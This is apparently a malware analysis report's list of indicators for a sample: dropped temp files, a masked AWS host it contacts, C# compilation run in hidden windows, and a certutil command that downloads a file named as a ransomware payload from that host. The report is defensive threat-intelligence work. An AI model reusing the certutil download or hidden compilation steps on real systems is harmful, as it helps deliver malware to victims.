Technical Information
- %WINDIR%\temp\a.bmp
- %TEMP%\yr8srsoa.0.cs
- %TEMP%\yr8srsoa.cmdline
- %TEMP%\yr8srsoa.out
- %TEMP%\csc8c66.tmp
- %TEMP%\res8ca6.tmp
- %TEMP%\yr8srsoa.dll
- %TEMP%\res8ca6.tmp
- %TEMP%\csc8c66.tmp
- %TEMP%\yr8srsoa.cmdline
- %TEMP%\yr8srsoa.0.cs
- %TEMP%\yr8srsoa.pdb
- %TEMP%\yr8srsoa.out
- %TEMP%\yr8srsoa.dll
- 'ec############71.us-east-2.compute.amazonaws.com':80
- DNS ASK ec############71.us-east-2.compute.amazonaws.com
- ClassName: 'SystemTray_Main' WindowName: ''
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yr8srsoa.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8CA6.tmp" "%TEMP%\CSC8C66.tmp"' (with hidden window)
- '<SYSTEM32>\certutil.exe' -urlcache -f http://ec############71.us-east-2.compute.amazonaws.com/ransomware-attack_.bmp %WINDIR%\Temp\a.bmp
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yr8srsoa.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8CA6.tmp" "%TEMP%\CSC8C66.tmp"